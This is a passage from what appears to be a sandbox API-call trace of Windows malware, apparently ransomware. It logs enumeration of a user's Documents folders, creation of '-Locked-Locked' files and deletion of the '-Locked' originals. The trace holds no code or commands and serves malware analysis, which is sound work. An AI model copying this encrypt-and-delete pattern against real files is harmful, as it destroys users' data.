dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0300.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0300.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0300.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c09621, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c09621, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c09621, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked", cAlternateFileName="NYMPGD~2.DOC")) returned 1 [0300.549] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336738ea, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336738ea, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336738ea, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NyM PGDB-5 iHZerCT.doc-Locked-Locked", cAlternateFileName="NYMPGD~1.DOC")) returned 1 [0300.549] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c1a8b8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c1a8b8, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c1a8b8, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked", cAlternateFileName="O4ACLZ~2.DOC")) returned 1 [0300.549] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3367d592, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3367d592, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3367d592, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o4aClzZ-jet.doc-Locked-Locked", cAlternateFileName="O4ACLZ~1.DOC")) returned 1 [0300.550] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x65ef9a5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0300.550] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c3a4ac, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c3a4ac, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c3a4ac, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked", cAlternateFileName="PA5CSH~2.DOC")) returned 1 [0300.550] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336835d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336835d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336835d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked-Locked", cAlternateFileName="PA5CSH~1.DOC")) returned 1 [0300.550] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0300.551] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c48e1b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c48e1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c48e1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked", cAlternateFileName="W7ZBDB~2.PPT")) returned 1 [0300.551] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3368984b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3368984b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3368984b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", cAlternateFileName="W7ZBDB~1.PPT")) returned 1 [0300.551] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c5a17a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c5a17a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c5a17a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked", cAlternateFileName="YPCZCD~2.PPT")) returned 1 [0300.552] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3368e5ec, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3368e5ec, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3368e5ec, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked-Locked", cAlternateFileName="YPCZCD~1.PPT")) returned 1 [0300.552] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c6ff73, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c6ff73, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c6ff73, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked", cAlternateFileName="ZBHJ~1.PDF")) returned 1 [0300.552] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33866cbc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33866cbc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33866cbc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked-Locked", cAlternateFileName="ZBHJ~2.PDF")) returned 1 [0300.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c7d5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c7d5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c7d5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 1 [0300.553] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3386e285, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", cAlternateFileName="ZFNXJ8~1.DOC")) returned 1 [0300.554] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3386e285, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", cAlternateFileName="ZFNXJ8~1.DOC")) returned 0 [0300.554] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0300.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af168) returned 1 [0300.554] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0300.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.554] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0300.555] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0300.555] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.555] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c982f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c982f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c982f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods-Locked", cAlternateFileName="BVTEJK~2.ODS")) returned 1 [0300.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32caa8b4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32caa8b4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32caa8b4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx-Locked", cAlternateFileName="MIKC8R~2.PPT")) returned 1 [0300.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32cb92e2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32cb92e2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cb92e2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx-Locked", cAlternateFileName="PPL3T~2.XLS")) returned 1 [0300.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32cc565e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32cc565e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cc565e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked", cAlternateFileName="RRSHMO~2.PDF")) returned 1 [0300.556] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.556] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.557] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0300.557] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0300.557] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.558] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.558] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c982f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c982f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c982f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods-Locked", cAlternateFileName="BVTEJK~2.ODS")) returned 1 [0300.558] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32caa8b4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32caa8b4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32caa8b4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mIKc8RXt4Q.pptx-Locked", cAlternateFileName="MIKC8R~2.PPT")) returned 1 [0300.559] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32cb92e2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32cb92e2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cb92e2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppl3T.xlsx-Locked", cAlternateFileName="PPL3T~2.XLS")) returned 1 [0300.559] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32cc565e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32cc565e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cc565e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked", cAlternateFileName="RRSHMO~2.PDF")) returned 1 [0300.559] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32cc565e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32cc565e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cc565e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRshMO_Ed0_wrhaH.pdf-Locked", cAlternateFileName="RRSHMO~2.PDF")) returned 0 [0300.560] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.560] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked", lpFilePart=0x0) returned 0x50 [0300.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.560] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.561] GetFileType (hFile=0x49c) returned 0x1 [0300.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.561] GetFileType (hFile=0x49c) returned 0x1 [0300.600] CloseHandle (hObject=0x49c) returned 1 [0300.601] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked", lpFilePart=0x0) returned 0x49 [0300.601] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked")) returned 1 [0300.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked", lpFilePart=0x0) returned 0x4a [0300.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.603] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.603] GetFileType (hFile=0x49c) returned 0x1 [0300.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.603] GetFileType (hFile=0x49c) returned 0x1 [0300.605] CloseHandle (hObject=0x49c) returned 1 [0300.606] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked", lpFilePart=0x0) returned 0x43 [0300.606] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked")) returned 1 [0300.607] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x45 [0300.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.607] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.608] GetFileType (hFile=0x49c) returned 0x1 [0300.608] SetThreadErrorMode (dwNewMode=0x0, 